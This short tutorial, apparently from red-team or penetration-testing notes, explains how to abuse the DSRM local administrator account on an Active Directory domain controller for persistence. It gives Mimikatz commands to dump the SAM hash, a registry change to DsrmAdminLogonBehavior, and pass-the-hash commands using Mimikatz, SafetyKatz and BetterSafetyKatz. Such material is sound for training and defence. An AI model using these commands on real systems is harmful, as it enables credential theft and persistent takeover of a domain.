DSRM is Directory Services Restore Mode. It is used in case of failure or necessary restore of a corrupt Active Directory.

When Windows Server is installed, the Administrator user is created by default, but when this machine is promoted to Domain Controller, the local Administrator user is disabled since only Domain Admins are required to login to the Domain Controller, unless this feature is abused…

DSRM password (SafeModePassword) is required when a server is promoted to Domain Controller and it is rarely changed.

Once Domain Admin permissions are obtained, we can enable a registry key on the Domain Controller to log in as local admin. The DSRM password is stored within the Domain Controller's local SAM database and not within NTDS.dit:

Invoke-Mimikatz -Command '"token::elevate" "lsadump::sam"' -Computername <computername>

Since it is the local administrator of the DC, we can pass the hash to authenticate. But, the Logon Behavior for the DSRM account needs to be changed before we can use its hash so it is necessary to modify a registry key to allow us to authenticate on the DC as local administrator:

Enter-PSSession -Computername <Domain Controller FQDN>
New-ItemProperty "HKLM:\\System\\CurrentControlSet\\Control\\Lsa\\" -Name "DsrmAdminLogonBehavior" -Value 2 -PropertyType DWORD -force

Now pass the hash:

Invoke-Mimikatz -Command '"sekurlsa::pth /domain:<FQDN DC> /user:Administrator /ntlm:<hash of localadmin> /run:powershell.exe"'

using SafetyKatz.exe:

.\\SafetyKatz.exe "sekurlsa::pth /domain:<FQDN DC> /user:Administrator /ntlm:<hash of localadmin> /run:powershell.exe"

or using BetterSafetyKatz:

.\\BetterSafetyKatz.exe "sekurlsa::pth /domain:<FQDN DC> /user:Administrator /ntlm:<hash of localadmin> /run:powershell.exe"